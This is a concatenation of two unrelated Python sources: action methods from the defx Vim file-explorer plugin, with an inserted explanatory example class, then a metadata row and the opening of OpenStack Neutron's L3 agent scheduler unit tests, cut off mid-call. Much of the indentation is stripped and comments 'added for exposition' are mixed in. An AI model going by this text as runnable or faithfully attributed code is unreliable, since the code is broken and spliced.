def get_actions(self) -> typing.Dict[str, ActionTable]:
def predicate(o: object) -> bool:
return hasattr(o, '_is_action')
actions = {}
for member in inspect.getmembers(self, predicate):
func = member[1]
actions[func._name] = ActionTable(
func=partial(func._func, self), attr=func._attr)
return actions
@action(name='add_session', attr=ActionAttr.NO_TAGETS)
def _add_session(self, view: View, defx: Defx, context: Context) -> None:
path = context.args[0] if context.args else defx._cwd
if path[-1] == '/':
# Remove the last slash
path = path[: -1]
opened_candidates = [] if context.args else list(
defx._opened_candidates)
opened_candidates.sort()
session: Session
if path in view._sessions:
old_session = view._sessions[path]
session = Session(
name=old_session.name, path=old_session.path,
opened_candidates=opened_candidates)
else:
name = Path(path).name
session = Session(
name=name, path=path,
opened_candidates=opened_candidates)
view.print_msg(f'Session "{name}" is created')
view._sessions[session.path] = session
self._save_session(view, defx, context)
@action(name='call', attr=ActionAttr.REDRAW)
def _call(self, view: View, defx: Defx, context: Context) -> None:
"""
Call the function.
"""
function = context.args[0] if context.args else None
if not function:
return
dict_context = context._asdict()
dict_context['cwd'] = defx._cwd
dict_context['targets'] = [
str(x['action__path']) for x in context.targets]
view._vim.call(function, dict_context)
@action(name='change_filtered_files', attr=ActionAttr.REDRAW)
def _change_filtered_files(self, view: View, defx: Defx,
context: Context) -> None:
filtered_files = context.args[0] if context.args else view._vim.call(
'defx#util#input',
f'{".".join(defx._filtered_files)} -> ',
'.'.join(defx._filtered_files))
defx._filtered_files = filtered_files.split(',')
@action(name='change_ignored_files', attr=ActionAttr.REDRAW)
def _change_ignored_files(self, view: View, defx: Defx,
context: Context) -> None:
ignored_files = context.args[0] if context.args else view._vim.call(
'defx#util#input',
f'{".".join(defx._ignored_files)} -> ',
'.'.join(defx._ignored_files))
defx._ignored_files = ignored_files.split(',')
@action(name='clear_clipboard', attr=ActionAttr.NO_TAGETS)
def _clear_clipboard(self, view: View, defx: Defx,
context: Context) -> None:
view._clipboard.action = ClipboardAction.NONE
view._clipboard.candidates = []
@action(name='clear_select_all',
attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _clear_select_all(self, view: View, defx: Defx,
context: Context) -> None:
for candidate in [x for x in view._candidates
if x['_defx_index'] == defx._index]:
candidate['is_selected'] = False
@action(name='close_tree', attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _close_tree(self, view: View, defx: Defx, context: Context) -> None:
for target in context.targets:
if target['is_directory'] and target['is_opened_tree']:
view.close_tree(target['action__path'], defx._index)
else:
view.close_tree(target['action__path'].parent, defx._index)
view.search_file(target['action__path'].parent, defx._index)
@action(name='delete_session', attr=ActionAttr.NO_TAGETS)
def _delete_session(self, view: View, defx: Defx,
context: Context) -> None:
if not context.args:
return
session_name = context.args[0]
if session_name not in view._sessions:
return
view._sessions.pop(session_name)
self._save_session(view, defx, context)
@action(name='load_session', attr=ActionAttr.NO_TAGETS)
def _load_session(self, view: View, defx: Defx, context: Context) -> None:
session_file = Path(context.session_file)
if not context.session_file or not session_file.exists():
return
loaded_session = json.loads(session_file.read_text())
if 'sessions' not in loaded_session:
return
view._sessions = {}
for path, session in loaded_session['sessions'].items():
view._sessions[path] = Session(**session)
view._vim.current.buffer.vars['defx#_sessions'] = [
x._asdict() for x in view._sessions.values()
]
@action(name='multi')
def _multi(self, view: View, defx: Defx, context: Context) -> None:
for arg in context.args:
args: typing.List[typing.Union[str, typing.List[str]]]
if isinstance(arg, list):
args = arg
else:
args = [arg]
action_args = ((args[1] if isinstance(args[1], list)
else [args[1]])
if len(args) > 1 else [])
do_action(view, defx, str(args[0]),
context._replace(args=action_args))
@action(name='check_redraw', attr=ActionAttr.NO_TAGETS)
def _nop(self, view: View, defx: Defx, context: Context) -> None:
pass
@action(name='open_tree', attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _open_tree(self, view: View, defx: Defx, context: Context) -> None:
nested = False
recursive_level = 0
toggle = False
for arg in context.args:
if arg == 'nested':
nested = True
elif arg == 'recursive':
recursive_level = 20
elif re.search(r'recursive:\d+', arg):
recursive_level = int(arg.split(':')[1])
elif arg == 'toggle':
toggle = True
for target in [x for x in context.targets if x['is_directory']]:
if toggle and target['is_directory'] and target['is_opened_tree']:
self._close_tree(
view, defx, context._replace(targets=[target]))
else:
view.open_tree(target['action__path'],
defx._index, nested, recursive_level)
@action(name='open_tree_recursive',
attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _open_tree_recursive(self, view: View, defx: Defx,
context: Context) -> None:
level = context.args[0] if context.args else '20'
self._open_tree(view, defx, context._replace(
args=context.args + ['recursive:' + level]))
@action(name='open_or_close_tree',
attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _open_or_close_tree(self, view: View, defx: Defx,
context: Context) -> None:
self._open_tree(view, defx, context._replace(
args=context.args + ['toggle']))
@action(name='print')
def _print(self, view: View, defx: Defx, context: Context) -> None:
for target in context.targets:
view.print_msg(str(target['action__path']))
@action(name='quit', attr=ActionAttr.NO_TAGETS)
def _quit(self, view: View, defx: Defx, context: Context) -> None:
view.quit()
@action(name='redraw', attr=ActionAttr.NO_TAGETS)
def _redraw(self, view: View, defx: Defx, context: Context) -> None:
view.redraw(True)
@action(name='repeat', attr=ActionAttr.MARK)
def _repeat(self, view: View, defx: Defx, context: Context) -> None:
do_action(view, defx, view._prev_action, context)
@action(name='resize', attr=ActionAttr.NO_TAGETS)
def _resize(self, view: View, defx: Defx, context: Context) -> None:
if not context.args:
return
view._context = view._context._replace(winwidth=int(context.args[0]))
view._init_window()
view.redraw(True)
@action(name='save_session', attr=ActionAttr.NO_TAGETS)
def _save_session(self, view: View, defx: Defx, context: Context) -> None:
view._vim.current.buffer.vars['defx#_sessions'] = [
x._asdict() for x in view._sessions.values()
]
if not context.session_file:
return
session_file = Path(context.session_file)
session_file.write_text(json.dumps({
'version': view._session_version,
'sessions': {x: y._asdict() for x, y in view._sessions.items()}
}))
@action(name='search', attr=ActionAttr.NO_TAGETS)
def _search(self, view: View, defx: Defx, context: Context) -> None:
if not context.args or not context.args[0]:
return
search_path = Path(context.args[0])
if not search_path.is_absolute():
# Use relative directory instead.
search_path = Path(Path(defx._cwd).joinpath(context.args[0]))
view.search_file(search_path, defx._index)
@action(name='search_recursive', attr=ActionAttr.NO_TAGETS)
def _search_recursive(self, view: View, defx: Defx,
context: Context) -> None:
if not context.args or not context.args[0]:
return
search_path = Path(context.args[0])
if not search_path.is_absolute():
# Use relative directory instead.
search_path = Path(Path(defx._cwd).joinpath(context.args[0]))
if not view.search_recursive(search_path, defx._index):
# Not found in current path.
# Change defx directory to "search_path".
view.cd(defx, defx._source.name,
str(search_path.parent), context.cursor)
view.search_recursive(search_path, defx._index)
@action(name='toggle_columns', attr=ActionAttr.REDRAW)
def _toggle_columns(self, view: View, defx: Defx,
context: Context) -> None:
"""
Toggle the current columns.
"""
columns = (context.args[0] if context.args else '').split(':')
if not columns:
return
current_columns = [x.name for x in view._columns]
if columns == current_columns:
# Use default columns
columns = context.columns.split(':')
view._init_columns(columns)
@action(name='toggle_ignored_files', attr=ActionAttr.REDRAW)
def _toggle_ignored_files(self, view: View, defx: Defx,
context: Context) -> None:
defx._enabled_ignored_files = not defx._enabled_ignored_files
@action(name='toggle_select', attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _toggle_select(self, view: View, defx: Defx, context: Context) -> None:
candidate = view.get_cursor_candidate(context.cursor)
if not candidate:
return
candidate['is_selected'] = not candidate['is_selected']
@action(name='toggle_select_all',
attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _toggle_select_all(self, view: View, defx: Defx,
context: Context) -> None:
for candidate in [x for x in view._candidates
if not x['is_root'] and
x['_defx_index'] == defx._index]:
candidate['is_selected'] = not candidate['is_selected']
@action(name='toggle_select_visual',
attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _toggle_select_visual(self, view: View, defx: Defx,
context: Context) -> None:
if context.visual_start <= 0 or context.visual_end <= 0:
return
start = context.visual_start - 1
end = min([context.visual_end, len(view._candidates)])
for candidate in [x for x in view._candidates[start:end]
if not x['is_root'] and
x['_defx_index'] == defx._index]:
candidate['is_selected'] = not candidate['is_selected']
@action(name='toggle_sort', attr=ActionAttr.MARK |
ActionAttr.NO_TAGETS | ActionAttr.REDRAW)
def _toggle_sort(self, view: View, defx: Defx, context: Context) -> None:
"""
Toggle the current sort method.
"""
sort = context.args[0] if context.args else ''
if sort == defx._sort_method:
# Use default sort method
defx._sort_method = context.sort
else:
defx._sort_method = sort
@action(name='yank_path')
def _yank_path(self, view: View, defx: Defx, context: Context) -> None:
mods = context.args[0] if context.args else ''
paths = [str(x['action__path']) for x in context.targets]
if mods:
paths = [view._vim.call('fnamemodify', x, mods) for x in paths]
yank = '\n'.join(paths)
view._vim.call('setreg', '"', yank)
if (view._vim.call('has', 'clipboard') or
view._vim.call('has', 'xterm_clipboard')):
view._vim.call('setreg', '+', yank)
view.print_msg('Yanked:\n' + yank)
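# ---------------------------------------------------------------------------
# Illustrative sketch (added for exposition; not part of defx itself): a
# custom kind only needs to subclass Base and mark methods with @action, and
# get_actions() will expose them automatically. The action name below is
# hypothetical.
# ---------------------------------------------------------------------------
class _ExampleKind(Base):
    def __init__(self, vim: Nvim) -> None:
        super().__init__(vim)
        self.name = 'example'
    @action(name='echo_targets')
    def _echo_targets(self, view: View, defx: Defx, context: Context) -> None:
        # Mirrors the built-in 'print' action: echo each target's path.
        for target in context.targets:
            view.print_msg(str(target['action__path']))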
| 5cec9fcfcfb9140cc58eb71007802e685566b32f | bed34365a9dab825fd9f4a4ff1b0863f441266ac | /neutron/tests/unit/scheduler/test_l3_agent_scheduler.py | b729e0f78b3a45b978b4c11efc6e1a210be55c8e | ["Apache-2.0"] | permissive | openstack/neutron | 0913ee3cd69d5bdb9c10aa084d4e1803abee320c | dde31aae392b80341f6440eb38db1583563d7d1f | refs/heads/master | 2023-08-31T13:09:41.831598 | 2023-08-31T11:37:30 | 2023-08-31T11:37:30 | 2,400,289 | 1,174 | 1,325 | Apache-2.0 | 2022-06-29T08:00:05 | 2011-09-16T16:04:08 | Python | UTF-8 | Python | false | false | 97,948 | py | test_l3_agent_scheduler.py |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import contextlib
import datetime
from unittest import mock
from neutron_lib.api import attributes
from neutron_lib.api.definitions import l3_ext_ha_mode
from neutron_lib.api.definitions import network_ha
from neutron_lib.api.definitions import portbindings
from neutron_lib.api.definitions import router_availability_zone
from neutron_lib.callbacks import events
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib import context as n_context
from neutron_lib.exceptions import l3 as l3_exc
from neutron_lib import fixture
from neutron_lib.plugins import constants as plugin_constants
from neutron_lib.plugins import directory
from neutron_lib import rpc as n_rpc
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from sqlalchemy import orm
import testscenarios
import testtools
from neutron.db import db_base_plugin_v2 as db_v2
from neutron.db import l3_db
from neutron.db import l3_dvr_db
from neutron.db import l3_dvr_ha_scheduler_db
from neutron.db import l3_dvrscheduler_db
from neutron.db import l3_hamode_db
from neutron.db import l3_hascheduler_db
from neutron.extensions import l3agentscheduler as l3agent
from neutron import manager
from neutron.objects import agent as agent_obj
from neutron.objects import l3_hamode
from neutron.objects import l3agent as rb_obj
from neutron import quota
from neutron.scheduler import l3_agent_scheduler
from neutron.tests import base
from neutron.tests.common import helpers
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.extensions import test_l3
from neutron.tests.unit import testlib_api
# the below code is required for the following reason
# (as documented in testscenarios)
"""Multiply tests depending on their 'scenarios' attribute.
This can be assigned to 'load_tests' in any test module to make this
automatically work across tests in the module.
"""
load_tests = testscenarios.load_tests_apply_scenarios
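# Note (added for exposition): with testscenarios, a test class can declare
#     scenarios = [('dvr', {'distributed': True}),
#                  ('legacy', {'distributed': False})]
# and the load_tests hook above clones every test once per scenario, setting
# the scenario's attributes on each cloned test instance.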
HOST_DVR = 'my_l3_host_dvr'
HOST_DVR_SNAT = 'my_l3_host_dvr_snat'
DEVICE_OWNER_COMPUTE = constants.DEVICE_OWNER_COMPUTE_PREFIX + 'fake'
DEVICE_OWNER_COMPUTE_NOVA = constants.DEVICE_OWNER_COMPUTE_PREFIX + 'nova'
class FakeL3Scheduler(l3_agent_scheduler.L3Scheduler):
def schedule(self):
pass
def _choose_router_agent(self):
pass
def _choose_router_agents_for_ha(self):
pass
class FakePortDB(object):
def __init__(self, port_list):
self._port_list = port_list
def _get_query_answer(self, port_list, filters):
answers = []
for port in port_list:
matched = True
for key, search_values in filters.items():
port_value = port.get(key, None)
if not port_value:
matched = False
break
if isinstance(port_value, list):
sub_answers = self._get_query_answer(port_value,
search_values)
matched = len(sub_answers) > 0
else:
matched = port_value in search_values
if not matched:
break
if matched:
answers.append(port)
return answers
def get_port(self, context, port_id):
for port in self._port_list:
if port['id'] == port_id:
if port['tenant_id'] == context.tenant_id or context.is_admin:
return port
break
return None
def get_ports(self, context, filters=None):
query_filters = dict()
if filters:
query_filters.update(filters)
if not context.is_admin:
query_filters['tenant_id'] = [context.tenant_id]
result = self._get_query_answer(self._port_list, query_filters)
return result
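# Note (added for exposition): FakePortDB mimics the plugin's port queries.
# Each filter value is a collection of acceptable values, and list-valued
# fields are matched recursively, e.g. (hypothetical data):
#     db = FakePortDB([{'id': 'p1', 'tenant_id': 't1',
#                       'fixed_ips': [{'subnet_id': 's1'}]}])
#     db.get_ports(admin_ctx, filters={'fixed_ips': {'subnet_id': ['s1']}})
# returns the single matching port; non-admin contexts are additionally
# restricted to their own tenant_id.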
class L3SchedulerBaseTestCase(base.BaseTestCase):
def setUp(self):
super(L3SchedulerBaseTestCase, self).setUp()
self.scheduler = FakeL3Scheduler()
self.plugin = mock.Mock()
def _test__get_routers_can_schedule(self, routers, agent, target_routers):
self.plugin.get_l3_agent_candidates.return_value = agent
result = self.scheduler._get_routers_can_schedule(
self.plugin, mock.ANY, routers, mock.ANY)
self.assertEqual(target_routers, result)
def test__get_routers_can_schedule_with_compat_agent(self):
routers = [{'id': 'foo_router'}]
self._test__get_routers_can_schedule(routers, mock.ANY, routers)
def test__get_routers_can_schedule_with_no_compat_agent(self):
routers = [{'id': 'foo_router'}]
self._test__get_routers_can_schedule(routers, None, [])
def test__get_candidates_iterable_on_early_returns(self):
plugin = mock.MagicMock()
# non-distributed router already hosted
plugin.get_l3_agents_hosting_routers.return_value = [{'id': 'a1'}]
router = {'distributed': False, 'id': 'falafel'}
iter(self.scheduler._get_candidates(plugin, mock.MagicMock(), router))
# distributed router but no agents
router['distributed'] = True
plugin.get_l3_agents.return_value = []
iter(self.scheduler._get_candidates(plugin, mock.MagicMock(), router))
self.assertFalse(plugin.get_l3_agent_candidates.called)
def test__get_candidates_skips_get_l3_agent_candidates_if_dvr_scheduled(
self):
plugin = mock.MagicMock()
# distributed router already hosted
plugin.get_l3_agents_hosting_routers.return_value = [{'id': 'a1'}]
router = {'distributed': True, 'id': uuidutils.generate_uuid()}
plugin.get_l3_agents.return_value = ['a1']
self.scheduler._get_candidates(plugin, mock.MagicMock(), router)
self.assertFalse(plugin.get_l3_agent_candidates.called)
class L3SchedulerBaseMixin(object):
def _register_l3_agents(self, plugin=None):
self.agent1 = helpers.register_l3_agent(
'host_1', constants.L3_AGENT_MODE_LEGACY)
self.agent_id1 = self.agent1.id
self.agent2 = helpers.register_l3_agent(
'host_2', constants.L3_AGENT_MODE_LEGACY)
self.agent_id2 = self.agent2.id
def _register_l3_dvr_agents(self):
self.l3_dvr_agent = helpers.register_l3_agent(
HOST_DVR, constants.L3_AGENT_MODE_DVR)
self.l3_dvr_agent_id = self.l3_dvr_agent.id
self.l3_dvr_snat_agent = helpers.register_l3_agent(
HOST_DVR_SNAT, constants.L3_AGENT_MODE_DVR_SNAT)
self.l3_dvr_snat_id = self.l3_dvr_snat_agent.id
def _set_l3_agent_admin_state(self, context, agent_id, state=True):
update = {'agent': {'admin_state_up': state}}
self.plugin.update_agent(context, agent_id, update)
def _set_l3_agent_dead(self, agent_id):
update = {
'agent': {
'heartbeat_timestamp':
timeutils.utcnow() - datetime.timedelta(hours=1)}}
self.plugin.update_agent(self.adminContext, agent_id, update)
@contextlib.contextmanager
def router_with_ext_gw(self, name='router1', admin_state_up=True,
fmt=None, tenant_id=None,
external_gateway_info=None,
subnet=None, **kwargs):
tenant_id = tenant_id or self._tenant_id
router = self._make_router(fmt or self.fmt, tenant_id, name,
admin_state_up, external_gateway_info,
**kwargs)
self._add_external_gateway_to_router(
router['router']['id'],
subnet['subnet']['network_id'])
yield router
self._remove_external_gateway_from_router(
router['router']['id'], subnet['subnet']['network_id'])
self._delete('routers', router['router']['id'])
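    # Note (added for exposition): tests below typically pair this helper with
    # an external subnet, e.g.
    #     with self.subnet() as subnet:
    #         self._set_net_external(subnet['subnet']['network_id'])
    #         with self.router_with_ext_gw(name='r1', subnet=subnet) as r:
    #             ...
    # so the router is created, attached to the gateway network, and cleaned
    # up when the context exits.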
class L3SchedulerTestBaseMixin(object):
def _test_add_router_to_l3_agent(self,
distributed=False,
already_scheduled=False,
external_gw=None):
agent_id = self.agent_id1
agent = self.agent1
if distributed:
self._register_l3_dvr_agents()
agent_id = self.l3_dvr_snat_id
agent = self.l3_dvr_snat_agent
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
router['router']['distributed'] = distributed
router['router']['external_gateway_info'] = external_gw
if already_scheduled:
self._test_schedule_bind_router(agent, router)
with mock.patch.object(self.plugin,
"validate_agent_router_combination"),\
mock.patch.object(self.plugin,
"create_router_to_agent_binding") as auto_s,\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.plugin.add_router_to_l3_agent(self.adminContext, agent_id,
router['router']['id'])
self.assertNotEqual(already_scheduled, auto_s.called)
def test__unbind_router_removes_binding(self):
agent_id = self.agent_id1
agent = self.agent1
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
self._test_schedule_bind_router(agent, router)
self.plugin._unbind_router(self.adminContext,
router['router']['id'],
agent_id)
bindings = rb_obj.RouterL3AgentBinding.get_l3_agents_by_router_ids(
self.adminContext, [router['router']['id']])
self.assertEqual(0, len(bindings))
def _create_router_for_l3_agent_dvr_test(self,
distributed=False,
external_gw=None):
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
router['router']['distributed'] = distributed
router['router']['external_gateway_info'] = external_gw
return router
def _prepare_l3_agent_dvr_move_exceptions(self,
distributed=False,
external_gw=None,
agent_id=None,
expected_exception=None):
router = self._create_router_for_l3_agent_dvr_test(
distributed=distributed, external_gw=external_gw)
with mock.patch.object(self.plugin, "create_router_to_agent_binding"),\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.assertRaises(expected_exception,
self.plugin.add_router_to_l3_agent,
self.adminContext, agent_id,
router['router']['id'])
def test__schedule_router_skips_unschedulable_routers(self):
mock.patch.object(self.plugin, 'router_supports_scheduling',
return_value=False).start()
scheduler = l3_agent_scheduler.ChanceScheduler()
self.assertIsNone(scheduler._schedule_router(self.plugin,
self.adminContext,
'router_id'))
def test_add_router_to_l3_agent_mismatch_error_dvr_to_legacy(self):
self._register_l3_agents()
self._prepare_l3_agent_dvr_move_exceptions(
distributed=True,
agent_id=self.agent_id1,
expected_exception=l3agent.RouterL3AgentMismatch)
def test_add_router_to_l3_agent_mismatch_error_legacy_to_dvr(self):
self._register_l3_dvr_agents()
self._prepare_l3_agent_dvr_move_exceptions(
agent_id=self.l3_dvr_agent_id,
expected_exception=l3agent.DVRL3CannotAssignToDvrAgent)
def test_add_router_to_l3_agent_mismatch_error_dvr_to_dvr(self):
self._register_l3_dvr_agents()
self._prepare_l3_agent_dvr_move_exceptions(
distributed=True,
agent_id=self.l3_dvr_agent_id,
expected_exception=l3agent.DVRL3CannotAssignToDvrAgent)
def test_add_router_to_l3_agent_dvr_to_snat(self):
external_gw_info = {
"network_id": uuidutils.generate_uuid(),
"enable_snat": True
}
self._register_l3_dvr_agents()
agent_id = self.l3_dvr_snat_id
router = self._create_router_for_l3_agent_dvr_test(
distributed=True,
external_gw=external_gw_info)
with mock.patch.object(self.plugin,
"validate_agent_router_combination"),\
mock.patch.object(
self.plugin,
"create_router_to_agent_binding") as rtr_agent_binding,\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.plugin.add_router_to_l3_agent(self.adminContext, agent_id,
router['router']['id'])
rtr_agent_binding.assert_called_once_with(
self.adminContext, mock.ANY, router['router'])
def test_add_router_to_l3_agent(self):
self._test_add_router_to_l3_agent()
def test_add_distributed_router_to_l3_agent(self):
external_gw_info = {
"network_id": uuidutils.generate_uuid(),
"enable_snat": True
}
self._test_add_router_to_l3_agent(distributed=True,
external_gw=external_gw_info)
def test_add_router_to_l3_agent_already_scheduled(self):
self._test_add_router_to_l3_agent(already_scheduled=True)
def test_add_distributed_router_to_l3_agent_already_scheduled(self):
external_gw_info = {
"network_id": uuidutils.generate_uuid(),
"enable_snat": True
}
self._test_add_router_to_l3_agent(distributed=True,
already_scheduled=True,
external_gw=external_gw_info)
def test_remove_router_from_l3_agent_in_dvr_mode(self):
self._register_l3_dvr_agents()
self.assertRaises(l3agent.DVRL3CannotRemoveFromDvrAgent,
self.plugin.remove_router_from_l3_agent,
self.adminContext,
self.l3_dvr_agent_id,
mock.ANY)
def test_remove_router_from_l3_agent_in_dvr_snat_mode(self):
self._register_l3_dvr_agents()
router = self._create_router_for_l3_agent_dvr_test(
distributed=True)
agent_id = self.l3_dvr_snat_id
l3_notifier = mock.Mock()
self.plugin.agent_notifiers = {constants.AGENT_TYPE_L3: l3_notifier}
self.plugin.remove_router_from_l3_agent(self.adminContext, agent_id,
router['router']['id'])
l3_notifier.router_removed_from_agent.assert_called_once_with(
self.adminContext, router['router']['id'],
self.l3_dvr_snat_agent.host)
def _prepare_schedule_dvr_tests(self):
scheduler = l3_agent_scheduler.ChanceScheduler()
agent = agent_obj.Agent(mock.ANY, id=uuidutils.generate_uuid())
agent.admin_state_up = True
agent.heartbeat_timestamp = timeutils.utcnow()
plugin = mock.Mock()
plugin.get_l3_agents_hosting_routers.return_value = []
plugin.get_l3_agents.return_value = [agent]
plugin.get_l3_agent_candidates.return_value = [agent]
return scheduler, agent, plugin
def test_schedule_dvr_router_without_snatbinding_and_no_gw(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {
'id': 'foo_router_id',
'distributed': True
}
plugin.get_router.return_value = sync_router
with mock.patch.object(scheduler, 'bind_router'),\
mock.patch.object(plugin,
'get_snat_bindings',
return_value=False):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.get_l3_agents_hosting_routers(
mock.ANY, ['foo_router_id'], admin_state_up=True),
mock.call.get_l3_agents(mock.ANY, active=True),
mock.call.get_l3_agent_candidates(mock.ANY, sync_router, [agent]),
]
plugin.assert_has_calls(expected_calls)
def test_schedule_router_distributed(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {
'id': 'foo_router_id',
'distributed': True,
'external_gateway_info': {
'network_id': uuidutils.generate_uuid(),
'enable_snat': True
}
}
plugin.get_router.return_value = sync_router
with mock.patch.object(scheduler, 'bind_router'):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.get_l3_agents_hosting_routers(
mock.ANY, ['foo_router_id'], admin_state_up=True),
mock.call.get_l3_agents(mock.ANY, active=True),
mock.call.get_l3_agent_candidates(mock.ANY, sync_router,
[agent]),
]
plugin.assert_has_calls(expected_calls)
def _test_schedule_bind_router(self, agent, router):
ctx = self.adminContext
scheduler = l3_agent_scheduler.ChanceScheduler()
rid = router['router']['id']
scheduler.bind_router(self.plugin, ctx, rid, agent.id)
results = rb_obj.RouterL3AgentBinding.get_objects(ctx, router_id=rid)
self.assertGreater(len(results), 0)
self.assertIn(agent.id, [bind.l3_agent_id for bind in results])
def test_bind_new_router(self):
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
self._test_schedule_bind_router(self.agent1, router)
self.assertEqual(1, flog.call_count)
args, kwargs = flog.call_args
self.assertIn('is scheduled', args[0])
def test_bind_absent_router(self):
scheduler = l3_agent_scheduler.ChanceScheduler()
# checking that bind_router() is not throwing
# when supplied with router_id of non-existing router
scheduler.bind_router(self.plugin, self.adminContext,
uuidutils.generate_uuid(), self.agent_id1)
def test_bind_existing_router(self):
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
self._test_schedule_bind_router(self.agent1, router)
with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
self._test_schedule_bind_router(self.agent1, router)
self.assertEqual(1, flog.call_count)
args, kwargs = flog.call_args
self.assertIn('has already been scheduled', args[0])
def _check_get_l3_agent_candidates(
self, router, agent_list, exp_host, count=1):
candidates = self.plugin.get_l3_agent_candidates(self.adminContext,
router, agent_list)
self.assertEqual(count, len(candidates))
if count:
self.assertEqual(exp_host, candidates[0]['host'])
def test_get_l3_agent_candidates_legacy(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
agent_list = [self.agent1, self.l3_dvr_agent]
# test legacy agent_mode case: only legacy agent should be candidate
router['distributed'] = False
exp_host = 'host_1'
self._check_get_l3_agent_candidates(router, agent_list, exp_host)
def test_get_l3_agent_candidates_dvr(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
agent_list = [self.agent1, self.l3_dvr_agent]
# test dvr agent_mode case no candidates
router['distributed'] = True
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=True)
self._check_get_l3_agent_candidates(router, agent_list, None, count=0)
def test_get_l3_agent_candidates_dvr_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
agent_list = [self.agent1, self.l3_dvr_agent]
router['distributed'] = True
# Test no VMs present case
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=False)
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR, count=0)
def test_get_l3_agent_candidates_dvr_snat(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=True)
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)
def test_get_l3_agent_candidates_dvr_snat_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=False)
# Test no VMs present case
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host.return_value = False
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR_SNAT, count=1)
def test_get_l3_agent_candidates_dvr_ha_snat_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
router['distributed'] = True
router['ha'] = True
agent_list = [self.l3_dvr_snat_agent]
self.check_ports_exist_on_l3agent = mock.Mock(return_value=False)
# Test no VMs present case
self.check_ports_exist_on_l3agent.return_value = False
self.get_subnet_ids_on_router = mock.Mock(return_value=set())
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR_SNAT, count=1)
def test_get_l3_agent_candidates_centralized(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
# check centralized test case
router['distributed'] = False
agent_list = [self.l3_dvr_snat_agent]
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)
def test_get_l3_agents_hosting_routers(self):
agent = helpers.register_l3_agent('host_6')
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
ctx = self.adminContext
router_id = router['router']['id']
self.plugin.router_scheduler.bind_router(self.plugin, ctx,
router_id, agent.id)
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id])
self.assertEqual([agent.id], [agt.id for agt in agents])
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id],
